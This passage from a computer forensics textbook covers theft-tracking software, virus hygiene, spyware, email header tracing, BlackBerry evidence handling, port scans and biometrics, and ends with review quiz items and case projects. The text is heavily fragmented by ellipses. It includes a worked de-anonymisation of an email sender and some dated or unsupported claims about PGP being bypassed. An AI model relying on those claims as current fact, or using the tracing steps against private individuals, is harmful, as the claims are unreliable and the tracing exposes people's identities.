you’ve lost is worse, and the sensitivity of the information in your laptop, if it gets
into the hands of the wrong people, could be a disaster [9]
...
Is this really possible or is it just another fanciful hi-tech gimmick from the imagination of
the writers of the latest James Bond movie? It’s no gimmick
...

PC PhoneHome is a software application that, when installed in your laptop or
desktop computer, secretly transmits an electronic message to an email address of
your choice
...

How Does PC PhoneHome Work?

It’s simple
...
PC PhoneHome
sends a stealth email to your designated email address once a day, or every time you
connect to the Internet and are assigned an IP address different from your previous
IP address
...
When your stolen computer accesses the Internet

Types of Computer Forensics Technology

55

by any method, your lost or stolen computer will send you its stealth email message,
informing you of its location [9]
...
As a side benefit, any other items
of your property (like expensive jewelry) that might have been taken at the same
time may also be recovered [9]
...
The product is a natural fit
for the security monitoring and Internet service provider (ISP) industry
...

Basic Forensic Tools and Techniques
Today, many computer forensics workshops have been created to familiarize investigators and security personnel with the basic techniques and tools necessary for
a successful investigation of Internet and computer-related crimes
...
However, throughout the book, a number of them will be mentioned in detail
...

Forensic Services Available
Through computer forensic evidence acquisition services, forensic experts for companies like Capitol Digital Document Solutions [10] can provide management with
a potent arsenal of digital tools at its disposal
...
This image is an exact duplication of the source
media and allows evaluation within their laboratories with minimal disruption to
others
...

Don’t open any files attached to an email if the subject line is questionable or
unexpected
...

Disable the Windows Scripting Host
...
Although this can make your computer easier to use (being able to program shortcuts, or use third-party Visual Basic scripts), it is also a security risk
...
To remove Windows Scripting Host from your
computer, open up your Control Panel and select the Add/Remove Programs
icon
...

Always download files from well-known established and trusted sites
...
Install an anti-virus program
...
The program will warn you if any virus is detected
...
An
improperly configured anti-virus software can be as good as no software
...

Back up your files on a regular basis
...
You should store your backup copy in a separate location from your work files, one that is preferably not on your computer
...
Configure your anti-virus software to boot automatically on start-up and run at all times
...

Educate yourself about the latest viruses
...

Write-protect all system and software diskettes using the write-protect tab to
prevent any virus from spreading
...

Don’t boot from a floppy disk
...
If you use a floppy while working on your computer, remove it when
you shut the machine off or the computer will automatically try to boot from
the floppy, perhaps launching any viruses on the disk
...
Even a well-meaning friend may unknowingly pass along
a virus, trojan horse, or worm
...
This is always important, but especially if you
are using the disk to carry information between one computer and another
...
Running a virus scan before launching any of the programs on the
disk will prevent infection
...
This will ensure that the virus will not spread
...
You can find this option under the View menu
...
Consider using a different email program
...
Add your own address to your Outlook address book, so if it starts
sending out messages on its own, at least you’ll know about it
...


SPECIALIZED FORENSICS TECHNIQUES
Threats to the strategic value of your business almost always involve a computer or
network because that is where your company’s proprietary information and business processes are located
...
A malicious change to an individual’s personnel records
could cost the person a job and a career
...
Corporate espionage can steal trade secrets
...

Employees of a company might be stealing from it or using company resources to
work for themselves, or they can be using excessive work time to surf pornographic
sites and play games [11]
...
Gathering
legal evidence is difficult and requires trained specialists who know computers, the
rules of evidence gathering, and how to work with law enforcement authorities [11]
...
Any organization that does not have a way to detect and stop malicious behavior can be victimized with no legal recourse
...
When an intruder attacks or steals from an organization, the ability or threat to get law enforcement involved may be the only way to reduce the damage or prevent future occurrences
...

Companies employ computer forensics when there is serious risk of information being compromised, a potential loss of competitive capability, a threat of lawsuits, or potential damage to reputation and brand
...
In theory, employees are less
tempted to stray when they know they are being watched [11]
...
Companies have used legal evidence gathering
to drive home points with employees and external intruders even though the cost
of investigations exceeded recovery
...
Computer forensics also may not be needed when computers and networks play a minor
role in an incident or threat, but this may not always be clear
...

Legal Evidence
A computer forensics examiner always should gather and preserve evidence according
to Federal Rules of Evidence
...
Finding and isolating evidence to prove or disprove allegations
is as difficult as preserving it
...
Computer forensics has
been described as looking for one needle in a mountain of needles
...
The 1s and 0s that make up
data can be hidden and vanish instantly with a push of a button
...

Preparing evidence requires patience and thorough documentation so it can
withstand judicial scrutiny
...

Preserving computer evidence requires pre-incident planning and training of
employees in incident discovery procedures
...
Managers should make sure that there’s minimal disturbance of the computer, peripherals, and area surrounding the machine
...
Moreover, never run programs on a computer
in question
...
Finally, never let a suspect help open or turn on a machine [11]
...
Unfortunately,
there are no certified procedures for safe evidence gathering, nor is there a single approach for every type of case
...

Examiners will, for example, photograph equipment in place before removing
it and label wires and sockets so computers and peripherals can be reassembled exactly in a laboratory
...
They never touch original computer hard disks and
floppies
...
When suspects attempt to destroy
media, such as cutting up a floppy disk, investigators reassemble the pieces to read
the data from it
...

The internal clock might be wrong, a suspect might have tampered with logs, or the
mere act of turning on the computer might change a log irrevocably [11]
...
They then
calibrate or recalibrate evidence based on a time standard or work around log tampering, if possible [11]
...
It is a rule in computer forensics that
only the physical level of magnetic materials where the 1s and 0s of data are

60

Computer Forensics, Second Edition

recorded is real, and everything else is untrustworthy
...

Examiners search at the bit level of 1s and 0s across a wide range of areas inside
a computer, including email, temporary files in the Windows operating system and
in databases, swap fields that hold data temporarily, logical file structures, slack and
free space on the hard drive, software settings, script files that perform preset activities, Web browser data caches, bookmarks, and history and session logs that record
patterns of usage
...

Investigators have many tricks that help them get around the clever suspect
...
Rather, they look
for evidence in a computer that tells them what is in the encrypted file
...
For
data concealed within other files or buried inside the 1s and 0s of a picture, an investigator can tell the data is there even though it is inaccessible
...

When forensic examiners find computer evidence, they must present it in a
logical, compelling, and persuasive manner that a jury will understand and a defense counsel cannot rebut
...

Case presentation requires experience, which only can be gained through
courtroom appearances
...
An experienced examiner knows the questions that opposing attorneys
will ask and the ways to provide answers that withstand challenge
...
Not long ago, attorneys knew little about computers and how they operated, but today they do and
they are increasingly skilled at challenging examiners’ methods [11]
...
It is a fast-growing field because
computers and networks have moved to the heart of business and societal operations
...
Because investigations are so specialized, few organizations have the
human or technical resources to gather and compile evidence that withstands court
challenges
...
It’s important that managers and lawyers remember that computer evidence is fragile and that the best way to handle an incident is
to isolate it until examiners take over [11]
...
Computers that work miracles
in your day-to-day operations often malfunction—and you lose valuable data
...
Hackers, both inside and outside your company, can access your information, manipulate it, hide it, steal it, and cause huge losses of data [14]
...
When files or documents are
deleted from a computer, the majority of the actual information is typically left behind
...

Documents and files deleted or hidden even years ago may be recovered
through a computer investigation
...

What can you do about it right away? You should turn to computer forensic technicians or specialists (like Kessler International) for hard drive data recovery and other
data recovery services [14]
...
These teams of data recovery experts know how to retrieve your lost data from damaged and corrupt storage
media including hard drives, back-up systems, temporary storage units, and more
...


SPYWARE AND ADWARE
Spyware is Internet jargon for advertising supported software (adware)
...
There are several large media companies that approach shareware authors to
place banner ads in their products in exchange for a portion of the revenue from
banner sales
...
If you find the banners annoying, there is usually an option to
remove them by paying the regular licensing fee
...
” While according to the privacy policies of the companies, there will be no
sensitive or identifying data collected from your system and you shall remain
anonymous, the fact still remains that you have a live server sitting on your PC that
is sending information about you and your surfing habits to a remote location
...
There are also products that display advertising but do not
install any tracking mechanism on your system
...
However, there are certain issues that a privacy-oriented user may object
to and therefore prefer not to use the product
...

What’s the Hype About?
While legitimate adware companies will disclose the nature of data that is collected
and transmitted in their privacy statement (linked from their database, there is almost no way for the user to actually control what data is being sent)
...

On the Other Hand
Millions of people use advertising supported spyware products and could not care
less about the privacy hype
...

Real Spyware
There are also many PC surveillance tools that allow a user to monitor all kinds of
activity on a computer, ranging from keystroke capture, snapshots, email logging,
chat logging, and just about everything else
...
Furthermore, these tools are

Types of Computer Forensics Technology

63

perfectly legal in most places, but, just like an ordinary tape recorder, if they are
abused, they can seriously violate your privacy
...
Here, data recovery is only half the story, with the task of decryption providing a potentially greater obstacle to be overcome
...

Some of the most commonly used applications provide encryption protected
by passwords that can be readily defeated by investigators with the right tools and
the time to use them
...
Nevertheless, in
these cases it may still be possible to decrypt data by widening the scope of the investigation to include intelligence sources beyond the computer under investigation
...
To decrypt data encrypted in this fashion, a private key and
passphrase is needed
...
Similarly, the passphrase may be recorded somewhere on the computer in case it is forgotten or may be written down somewhere
and kept in a nearby location
...
One affects email
...
First, a
weakness has been discovered in the world’s most popular encryption program
that, in some circumstances, allows the encryption program to be completely bypassed
...
Second, hackers have recently
discovered a cloaking program that allows them to blow past firewalls on servers
and networks without being detected
...
These three revelations taken together are seriously bad news for Internet
privacy, confidentiality, and security
...
If a snoop can gain physical access to your computer or floppy disk where you store your secret key, he can modify it and wait for you
to use it
...
From that point on, he has access

64

Computer Forensics, Second Edition

to the rest of your encrypted personal information and you never know it
...

In this instance, the protection offered by encryption is illusory
...

Internet and Email Encryption and Security
For several years lawyers have been advised to use encryption programs to scramble
sensitive email messages before sending them
...

PGP is a dual key, algorithm-based code system that makes encrypted data practically
impossible to decipher
...
Of the 800
million people using the Internet, about 60 million use PGP to encrypt email
...
His second goal
was to work toward making PGP an international standard
...

The flaw is serious for two reasons
...
Until recently many systems that make e-commerce
available by credit card on the Internet have been based on PGP
...
Second, the theory behind PGP is essentially the same as that
used in the Rivest, Shamir and Adleman (RSA) standard for digital signatures
...

Next, let’s briefly look at how to protect data from being compromised
...


PROTECTING DATA FROM BEING COMPROMISED
In the past 25 years, since the introduction of the personal computer, a great change
has taken place in the way people use computers
...

They are used to assist with most tasks in the workplace
...
You
maintain financial records, schedule appointments, and store significant amounts
of business records, all electronically
...

Almost any type of investigation and litigation today may rely on protecting evidence obtained from computer systems
...
This evidence may be used to establish that a crime has been committed or
assert other points of fact in a court of law, such as identify suspects, defend the innocent, prosecute the guilty, and understand individuals’ motives and intents
...

In other words, computer forensics is used by experts to protect data from being
compromised
...

It is not sufficient to merely have the technical skills to locate evidence on computer media
...
These
experts’ knowledge of what to look for and where to look is also important
...
How can you find out who is sending you email from a certain AOL
or Hotmail account? Well, that’s not what this next section is about is about
...


INTERNET TRACING METHODS
If an email comes from a real, valid email account and you want to know who the
person behind that email account is, then you most likely will need to serve the Internet provider who is hosting that email account a court-order
...
Who
knows, he might have posted somewhere with his real name and address [13]
...

This can be done quite easily by simply changing the Sender and Return-to fields to
something different
...

Every email has a so-called header
...
Since the header is rather ugly, it is normally
hidden by the email program
...

The email text lines below are a typical, but not particularly sophisticated, example of faked email
...
You should, however, be aware that there are much more sophisticated ways
to fake email
...
security (see Figure 2
...
com/mrm/security/trace-forgery
...
But for now, back to the easy
cases, as shown by the following email lines [13]:
Received: from SpoolDir by IFKW-2 (Mercury 1
...
com>
Received: from bang
...
su
...
ifkw
...
de (Mercury
1
...
237
...
60] (Lilla_Red_10 [130
...
155
...
jmk
...
se (8
...
6/8
...
6) with ESMTP id PAA17265 for ...
de>; Wed, 13 May 1998 15:49:09 +0200 (MET DST)
X-Sender: o-pabjen@130
...
155
...
237
...
60]>
Mime-Version: 1
...
2 A message sent to the newsgroup alt
...


Types of Computer Forensics Technology

67

Content-Type: text/plain; charset=”us-ascii”
Date: Wed, 13 May 1998 15:49:06 +0200
To: luege-ti@ifkw
...
de
From: Kuno Seltsam ...
uni-muenchen
...
com>
Subject: Important Information

The preceding lines should look quite familiar
...
The following line is a number
that your email program (in this case Pegasus Mail) might add to the mail to keep
track of it on your hard disk [13]:
X-PMFLAGS: 34078848 0

The following lines state that the message contains normal, plain text without
any fancy letters like umlauts, etc
...
0 Content-Type: text/plain;
charset=”us-ascii”

The following line contains a tracking number, which the originating host has
assigned to the message
...
If you for some reason doubt that
the message really came from someone at seltsam
...
For this task, you can,
for example, use TJPing (http://www
...
com/), a small program that
tracks IP packages online and resolves IP numbers [13]:
Message-Id: ...
155
...
237
...
60 - May 14, 1998
22:01:25
Official Name: L-Red-10
...
su
...
237
...
60

68

Computer Forensics, Second Edition

This is the originating computer from which the message was sent, not the
mailserver
...
The situation is
very different within companies, though, since employees tend to have their own
computers, which no one else uses
...
It is comparatively easy to find out which company you are dealing with
...
), add www and type
it into your browser
...
jmk
...
se is the journalism department
of the University of Stockholm [13]
...
This tells you who was logged on to the mailserver when the message was sent
...
Eudora (http://www
...
com/) does, whereas Pegasus Mail doesn’t [13]
...
237
...
254

So now you know that the user who sent us the mail is o-pabjen
...

topjimmysoftware
...
jmk
...
se)
...
237
...
254 or
o-pabjen@bang
...
su
...

Maybe you want to know his or her real name
...
Finger is a command that reveals basic information about the account holder
...
It is always worth a try, though
...
etoracing
...
htm), you’ll learn the following [13]:
Login name: o-pabjen In real life: Pabst Jens global

So, now you have a name: Jens Pabst
...

If you manage to obtain the information that’s been accumulated so far, then
you don’t actually have to look any further
...
“Kuno Seltsam ...
jmk
...
se>
...
237
...
60] (Lilla_Red_10 [130
...
155
...
jmk
...
se (8
...
6/8
...
6) with ESMTP id PAA17265 for ...
de>; Wed, 13 May 1998 15:49:09 +0200 (MET DST)

Types of Computer Forensics Technology

69

The preceding lines state which computer the mailserver has received the message from, when, and that the message is supposed to be sent to luege-ti@ifkw
...
de
...
ifkw
...
de) has received the message
...

Received: from bang
...
su
...
ifkw
...
de (Mercury
1
...
com>

and an internal message from the mailserver about where and how it distributed the
message within its system
...
somewhere
...

Received: from SpoolDir by IFKW-2 (Mercury 1
...
The procedures and tools
presented here are by no means all encompassing but are intended to elicit design of
custom tools by those more programmatically inclined
...


SECURITY AND WIRELESS TECHNOLOGIES
There are two types of RIM devices within each model class
...
The Exchange Edition employs Triple-DES encryption to send and receive, but the Internet Edition communicates in clear text
...

Relevance of RIM Computer Forensics
A RIM device shares the same evidentiary value as any other personal digital assistant (PDA)
...
However, the RIM’s
always-on, wireless push technology adds a unique dimension to forensic examination
...
In
fact, a RIM device does not need a cradle or desktop connection to be useful
...
Thus, the RIM’s currently unsurpassed portability is the examiner’s greatest ally
...
The logs must be accessed on the original unit before the programmer software development kit (SDK) tool is applied
...
Rather, they are reviewed using the following hidden
control functions
...
An
image or bit-by-bit backup is acquired using an SDK utility that dumps the contents
of the Flash RAM into a file easily examined with a hex editor
...
A reset can mean a file system cleanup
...

Evidence Review
Two options are available for information review using the hex dump: manual review of the Hex file using a hex editor and loading of the hex file into the BlackBerry
SDK simulator for review
...
Using
the SDK will assist in decoding dates on extant records
...
This abstraction qualifies as a file translation layer (FTL), hiding what is really a quite
complicated system of file management
...


Types of Computer Forensics Technology

71

Flash is organized similarly to dynamic random access memory (DRAM) and has
the 65 ns read performance to match
...
Writing flash is a binary AND or NAND, meaning each
1 in memory can be toggled to 0 but not back again without an erasure
...
An erasure costs more in terms of time than a write because of conditioning
...
Hidden databases,
partition gaps, and obfuscated data are but a few
...

Custom databases with no icon in the Ribbon graphical user interface (GUI)
are capable of providing hidden data transport
...
The average user
or uninformed investigator will never have knowledge of the hidden database
...
Unfortunately, it will need to be installed on the unit investigated for it to function
...
The computer forensics specialist can use this information to help figure out what hackers or worms are up to
...
A connection consists
of the pair of IP addresses that are talking to each other, as well a pair of port numbers that identify the protocol or service
...
When a firewall blocks
a connection, it will save the destination port number to its logfile
...
Port numbers are divided into three ranges:
The well-known ports are those from 0 through 1023
...
For example, port 80 virtually always indicates HTTP traffic
...
These are loosely
bound to services, which means that while there are numerous services

72

Computer Forensics, Second Edition

“bound” to these ports, these ports are likewise used for many other purposes
that have nothing to do with the official server
...
In theory,
no service should be assigned to these ports
...
However,
there are exceptions: for example, Sun starts their RPC ports at 32768
...
Usually, this is due to a “decoy” scan, such as in
“nmap
...

Computer forensics and protocol analysis can be used to track down who this
is
...
This will at least
point a finger at a decoy scan
...
Newer versions of scanners now randomize the attacker’s own TTL, making it harder to weed them out
...
You will often see that the attacker has
actually connected to you recently, while the decoyed addresses haven’t
...

Now let’s briefly look at how both government and commercial organizations
are implementing secure biometric personal identification (ID) systems to improve
confidence in verifying the identity of individuals seeking access to physical or virtual locations for computer forensics purposes
...


BIOMETRIC SECURITY SYSTEMS
The verification of individuals for computer forensics purposes is achieved using a
recognized ID credential issued from a secure and effective identity confirmation
process
...
A secure biometric ID
system can provide individuals with trusted credentials for a wide range of applications-from enabling access to facilities or secure networks, to proving an individual’s rights to services, to conducting online transactions
...


Types of Computer Forensics Technology

73

Biometric technologies, when used with a well-designed ID system, can provide the
means to ensure that an individual presenting a secure ID credential has the absolute
right to use that credential
...
Secure ID systems that require the highest degree
of security and privacy are increasingly implementing both smart card and biometric
technology
...
Smart cards provide the secure, convenient,
and cost-effective ID technology that stores the enrolled biometric template and
compares it to the live biometric template
...
Today computers are used in every facet of life
to create messages, compute profits, transfer funds, access bank accounts, and
browse the Internet for good and bad purposes
...
Computer users today have the benefits of super computer speeds and fast
Internet communications on a worldwide basis
...


74

Computer Forensics, Second Edition

In the past, documentary evidence was primarily limited to paper documents
...
Most documents today are stored on computer hard disk drives, floppy
diskettes, zip disks, and other types of removable computer storage media
...
Paper documents are no longer
considered the best evidence
...
Unlike paper documentation, computer evidence is fragile, and a
copy of a document stored in a computer file is identical to the original
...
Another unique aspect of computer evidence is the potential for unauthorized copies to be made of important computer files without leaving behind a trace
that the copy was made
...

Industrial espionage is alive and well in the cyber age, and the computer forensics specialist relies on computer evidence to prove the theft of trade secrets
...
The existence of this type of computer evidence is typically not known to the computer user, and the element of surprise can provide the computer forensics investigator with the advantage in the
interview of suspects in such cases
...

Computer evidence is relied on more and more in criminal and civil litigation
actions
...
Oliver North got into some of his trouble
with the U
...
Congress when erased computer files were recovered as computer evidence
...
In the
past, much wasted government and company staff time was attributed to the playing of the Windows Solitaire game on company time
...
Internet access by employees has also
created new problems associated with employees operating side businesses through
the unauthorized use of company and government Internet accounts
...
Computer forensics tools and

Types of Computer Forensics Technology

75

methodologies are used to identify and document computer evidence associated
with these types of computer abuses and activities
...
Most individuals think that
computer evidence is limited to data stored only in computer files
...
Computer evidence can exist in many forms
...
In Windows NT-based computer systems, the files
are called Page Files and the file is named PAGEFILE
...

Computer evidence can also be found in file slack and in unallocated file space
...
As much as 50% of the computer hard disk drive may contain such
data types in the form of email fragments, word processing fragments, directory
tree snapshots, and potentially almost anything that has occurred in past work sessions on the subject computer
...

Timelines of computer usage and file accesses can be valuable sources of computer evidence
...

Now let’s look at some of the more common conclusions that computer forensics technology can hope to answer
...

Conclusions Drawn
The term computer forensics was coined in 1991 in the first training session
held by the International Association of Computer Specialists (IACIS) in Portland, Oregon
...

Like any other forensic science, computer forensics deals with the application
of law to a science
...

Computer forensics has also been described as the autopsy of a computer hard
disk drive because specialized software tools and techniques are required to analyze the various levels at which computer data is stored after the fact
...
The field is relatively new to the private sector but it has been the mainstay of technology-related investigations and intelligence gathering in law enforcement and military agencies since the mid-1980s
...

Typically, computer forensic tools exist in the form of computer software
...

The use of different tools that have been developed independently to validate
results is important to avoid inaccuracies introduced by potential software design flaws and software bugs
...

Cross-validation through the use of multiple tools and techniques is standard
in all forensic sciences
...

Validation through the use of multiple software tools, computer specialists, and
procedures eliminates the potential for the destruction of forensic evidence
...

Society in general benefited, but so did criminals who use personal computers
in the commission of crimes
...

Computer forensics is used to identify evidence when personal computers are
used in the commission of crimes or in the abuse of company policies
...

In the past, documentary evidence was typically stored on paper and copies
were made with carbon paper or photocopy machines
...

Computer forensics deals with finding, extracting, and documenting this form
of electronic documentary evidence
...
1 in Appendix F), the computer forensics specialist should adhere to the provisional list of
actions for some of the principle types of computer forensic technology
...
A number of these technologies have been mentioned
in passing already
...
The answers and solutions by chapter can be found in Appendix E
...
True or False? Processing procedures and methodologies should not conform
to federal computer evidence processing standards
...
True or False? Computer evidence is fragile and susceptible to alteration or erasure by any number of occurrences
...
True or False? The need to preserve the computer evidence before processing a
computer should not be clearly demonstrated by the computer forensic
instructor through the use of programs designed to destroy data and modify
the operating systems
...
True or False? The documentation of forensic processing methodologies and
findings is not important
...
True or False? The occurrence of random memory dumps in hidden storage
areas should be discussed and covered in detail during workshops
...
The following are what it really costs to replace a stolen computer, except:
A
...
The price of replacing the software
C
...
The cost of lost production time or instruction time
E
...
Forensic services include but are not limited to the following, except:
A
...
Location and retrieval of deleted and hidden files
C
...
Email non-supervision and non-authentication
E
...
Port numbers are divided into three ranges, except for two of the following:
A
...
These are loosely
bound to services, and usually traffic on this port clearly indicates the protocol for that service
...

B
...
These are tightly
bound to services, and usually traffic on this port clearly indicates the protocol for that service
...

C
...
These are loosely
bound to services, which means that while there are numerous services
“bound” to these ports, these ports are likewise used for many other purposes that have nothing to do with the official server
...
The dynamic and private ports are those from 49152 through 65535
...

E
...
These are tightly
bound to services, which means that while there are numerous services
“bound” to these ports, these ports are likewise used for many other purposes that have nothing to do with the official server
...
A secure ID system using smart card and biometric technology provides the
following, except:
A
...
Improved security, protecting information, and processes within the ID
system and actively authenticating the trust level of the environment before
releasing information
C
...
Improved system return on investment through the flexibility and upgradability that smart cards provide, allowing support of different authentication methods and multiple, evolving applications

Types of Computer Forensics Technology

79

E
...
The legal aspects of a computer forensics investigation center primarily on the
following two main issues:
A
...
The requirements that need to be met in order for evidence to be successfully presented in court and, of course, considered legally admissible
C
...
The acceptance of the investigator to avoid the possibility of incurring
legal action against himself or the organization for whom he is reviewing
the investigation
E
...
The data resided in email, text documents, and file attachments
...
How would your advanced
document management services center (DMSC) handle this document review?

HANDS-ON PROJECTS
A large real estate corporation retained an accounting firm to investigate allegations
of embezzlement
...
How would
the accounting firm’s computer forensics team go about investigating this case?
Case Project
Let’s look at a real-world scenario and see how computer forensics plays into it
...
You’ve just inherited a large, diverse enterprise with
relatively few security controls when something happens
...
Even those attackers tricky enough
to slip through the firewall bounce harmlessly off your highly secured servers and trip
alarms throughout the network as they attempt to compromise it
...
You do have ways to stop the pain
...
For the purposes of this discussion, a number of these incidents have been
blended together to create a hypothetical company, Webfile
...

This case project discusses forensics in a Windows environment
...
How would you,
as a computer forensics specialist, go about detecting potential incidents, identifying the attack, and conducting host-based forensics?
Optional Team Case Project
This optional team case project discusses forensics in a Windows environment
...
Along the way, there will be a discussion
of some of the tools and techniques that are useful in this type of detective work
...
Before you start with the eradication phase of your incident
response, you really need to complete the identification phase: you have yet to
identify the initial compromise method or to identify the scope of the compromise!
At this point in the investigation, you have reason to believe the attackers are
making illicit use of the victim network to serve content to their friends and neighbors
...
Of more concern,
the investigation so far has yielded information that indicates the attackers have
compromised both local and domain administrator accounts in your enterprise
...
You want to determine how widespread the attacker’s control over the network is, what the initial compromise method was, and
who the attacker is (if possible)
...


Types of Computer Forensics Technology

81

REFERENCES
[1]

Feldman, John, and Giordano, Joseph V
...
, New York, NY 10017-5391, 2001
[2] WetStone Technologies, Inc
...
, Freeville, NY 13068,
2001
...
0 Evidence Grade Bitstream Backup Utility,” New Technologies, Inc
...
, Gresham, Oregon 97030
...
All rights reserved), 2004
...
, 2075 NE Division St
...
(© 2002
...
All
rights reserved), 2004
...
, 2075 NE Division St
...
(© 2004, New Technologies, Inc
...

[6]
“FILTER_G: English Grammer Forensic Filter,” New Technologies,
Inc
...
, Gresham, Oregon
...
All rights reserved), 2004
...
, 143 Main Street, Nanuet, NY 10954, 2001
...
, 2075 NE Division St
...
(© 2004, New
Technologies, Inc
...

[9] “PC PhoneHomeTM” is a trademark of Brigadoon Software, 143 Main
St
...
(PC PhoneHome Web site content: Copyright
2001-2005 Brigadoon Software, Inc
...
) (Web site copy
Copyright 2000-2005 SecurityKit
...
All rights reserved
...

[11] Walker, Don, “Computer Forensics: Techniques for Catching the ‘Perp’
Protect Company Data,” Enterprise Networks & Servers, Publications &
Communications, Inc
...
, Suite 150, Austin, TX
78759, (© 2003-2004 by Publications & Communications Inc
...

[12] “Data Recovery,” Kessler International World Headquarters, 45 Rockefeller Plaza, Suite 2000, New York, NY 10111-2000, (© 1995-2004
Michael G
...
All Rights Reserved), 2004
...
29, Munich, Germany
80469, (© 1998-2004 USUS], 2004
...
, 683 N
Main St
...

[15] “Smart Cards and Biometrics in Privacy-Sensitive Secure Personal Identification Systems,” Smart Card Alliance, 191 Clarksville Rd
...

[16] “2003 Computer Crime and Security Survey,” Federal Bureau of Investigation, J
...
, NW, Washington, D
...
20535-0001, 2003
...
It seems that any product that can remotely be tied to
network or computer security is quickly labeled as a “forensics” system
...
Today’s corporate climate of increased competition, cutbacks and layoffs, and outsourcing makes it essential that
corporate security policy and practices support the inevitability of future litigation
...
Answering the questions raised in this chapter will assist managers in creating sound corporate security policies and practices that support the
following computer forensics systems:

C

Internet security systems
Intrusion detection systems
Firewall security systems
Storage area network security systems
Network disaster recovery systems
Public key infrastructure security systems
Wireless network security systems
Satellite encryption security systems
Instant messaging (IM) security systems
Net privacy systems
Identity management security systems
Identity theft prevention systems
83

84

Computer Forensics, Second Edition

Biometric security systems
Homeland security systems

INTERNET SECURITY SYSTEMS
Internet and network security are topics that many executives and managers avoid
talking about
...
This lack of dialog has
resulted in some executives not being fully aware of the many advances and innovations in security technology that enable companies to confidently take full advantage of the benefits and capabilities of the Internet and intranets [1]
...
The purpose of this section is to demystify and inform the executive how Internet security can easily and effectively be implemented
in order to conduct computer forensics [1]
...
This policy needs to define the adequate and appropriate
Internet security measures necessary to safeguard a company’s systems, networks,
transactions, and data [1]
...
This step is no more difficult than the risk
management that a corporation already exercises every day
...
1 illustrates [1]
...
In addition to Internet security,

Types of Computer Forensics Systems

85

Misson
Critical
Departmental
Private
Company
Private
Public
Information
FIGURE 3
...


attention should be given to physical security (restricting the use of modems and
removable media and controlling access to devices) [1]
...

There may be legal requirements for securing this information [1]
...
Of course, it’s possible to get a
bit carried away with what information is considered to be private [1]
...
This information is often provided to
customers and interested parties by means of the Internet [1]
...
Often the primary risk is found to be internal
...
In other cases, a remote dial-in line used for debugging could be used to
gain general access to internal systems, bypassing other Internet security safeguards
...
It is often helpful to examine how
existing situations are handled [1]
...
The more security desired, the greater the cost required to provide it
...
Thus, establishing a corporate Internet security policy
involves the following:
High-level management policy statement
Systematic analysis of organizations assets
Examination of risks
Develop implementation strategy [1]
Public and Private Key Encryption
For many business and electronic commerce applications, it is necessary to
transmit information over communications lines and networks where there is
the potential for data to be altered, forged, or illicitly introduced
...
Two keys
exist, one public, the other private
...
The private key is retained by the recipient and is used to decrypt the received information
...

To use public key encryption across the Internet, steps must be taken to ensure
the integrity of the public key and the identity of its owner
...

To achieve secure, two-way communication across the Internet, without having previously exchanged keys, the Diffie-Hellman scheme may be used as shown
in Figure 3
...
Each party obtains the public key for the other from a certificate
authority and performs a special calculation with their own private keys
...

Network Security
Firewalls are a basic means for providing network security (and will be covered in
greater detail later in this chapter)
...
While
an important use of firewalls is to enable secure Internet access to corporate networks, they are also used to restrict access to departmental private and mission critical information [1]
...
2 Diffie-Hellman calculation
...
For it to work correctly, merchants must connect to a network of banks (both acquiring and issuing
banks), processors, and other financial institutions so that payment information
provided by the customer can be routed securely and reliably
...

Because payment information is highly sensitive, trust and confidence are essential
elements of any payment transaction
...

The Payment Processing Network

Here’s a breakdown of the participants and elements involved in processing payments:
Acquiring Bank: In the online payment processing world, an acquiring bank
provides internet merchant accounts
...
Examples of acquiring banks include Merchant
eSolutions and most major banks
...
In the online
payment processing world, an authorization also verifies that the billing information the customer has provided matches up with the information on record
with their credit card company
...
Examples include Visa® and MasterCard®
...

Customer Issuing Bank: A financial institution that provides a customer with
a credit card or other payment instrument
...
During a purchase, the customer issuing bank verifies that the payment information submitted to the merchant is valid and that the customer has
the funds or credit limit to make the proposed purchase
...
The merchant typically pays a processing fee for each transaction processed, also known as the
discount rate
...
The fees charged by the acquiring bank will vary
...

Payment Gateway: A service that provides connectivity among merchants, customers, and financial networks to process authorizations and payments
...

Processor: A large data center that processes credit card transactions and settles funds to merchants
...

Settlement: The process by which transactions with authorization codes are
sent to the processor for payment to the merchant
...


Controlling Access
One aspect of implementing a security policy is being able to control which users
have access to particular systems and the data that they can access
...
Some of these products will
be discussed in detail later in the chapter and throughout the book [1]
...
Many
companies provide each of their remote users with a digital token card (also called
hard tokens) to increase their assurance of the identity of each remote user [1]
...
Verisign is a commercial certification authority that issues digital certificates providing assurance of the identify of an individual
...
Additional information may also be included, depending on the type of certificate
...

Verisign provides two types of digital certificates: personal certificates to provide assurance of the identity of an individual and secure server certificates to protect communications with a given server and allow verification of the identity of a
server
...
A Class 2 personal certificate requires confirmation of name,
mailing address, and other personal information by an Equifax consumer database,
along with a physical mail-back process to ensure that the request was not generated by someone with access to an applicant’s personal information [1]
...
The process of obtaining a certificate will be similar to that shown in Figure 3
...


User

• Generate key pair
• Complete form
• Personally take form to bank
Bank / Certificate Authority

• Review form
• Verify identification
• Upon approval, generate cetificate
• Give diskette with certificate to signer
User

• Install certificate
• Create signed messages and records
FIGURE 3
...


90

Computer Forensics, Second Edition

Privacy and Encryption

Another means of controlling access to information is to encrypt it
...
Encryption should only be used in a carefully thought
out manner, as part of a security policy, not as a substitute [1]
...
It runs on virtually every platform
...
In other words, PGP offers the
advantage of running on a wide variety of systems and providing individuals with
the ability to keep certain data confidential [1]
...
Significant reduction in internal
corporate networking costs can be achieved by using secure, encrypted, Internet protocol (IP)-level network communications over less expensive public networks, called
secure virtual private networks (SVPN)
...

Security Futures: Smart Cards
Logically, a smart card is equivalent to an electronic safe deposit box
...
The software within the card detects attempts
at intrusion and tampering and monitors abnormal usage
...
While smart cards are popular in
Asia and Europe, they are just beginning to become popular here in the United
States
...

Health care: Portable, customized health care file with medical emergency data
and HMO and insurance information
...


Types of Computer Forensics Systems

91

Contactless tickets for ski resorts and airlines: Increases speed, convenience,
and security and facilitates baggage checking [1]
...
They offer superior security and lower life
cycle costs than alternatives such as coins, paper money, and magnetic stripe cards [1]
...
There are many different algorithms in use for
smart cards, but all act to verify the authenticity of cards and to prevent misuse or
fraud
...
Limits are typically placed on the number of erroneous attempts, preventing brute-force attempts [1]
...
Now
let’s move on to the next computer forensics system: intrusion detection systems
...
They collect information from a variety of vantage points within computer
systems and networks and analyze this information for symptoms of security problems
...
Both intrusion detection and vulnerability assessment technologies allow organizations to
protect themselves from losses associated with network security problems
...

Protecting critical information systems and networks is a complex operation,
with many tradeoffs and considerations
...
This section also provides
the information one needs to be a savvy consumer in the areas of intrusion detection and vulnerability assessment
...

They accomplish this goal by collecting information from a variety of system and network sources and then analyzing the information for symptoms of security problems
...
Intrusion detection systems perform a variety of functions:
Monitoring and analysis of user and system activity
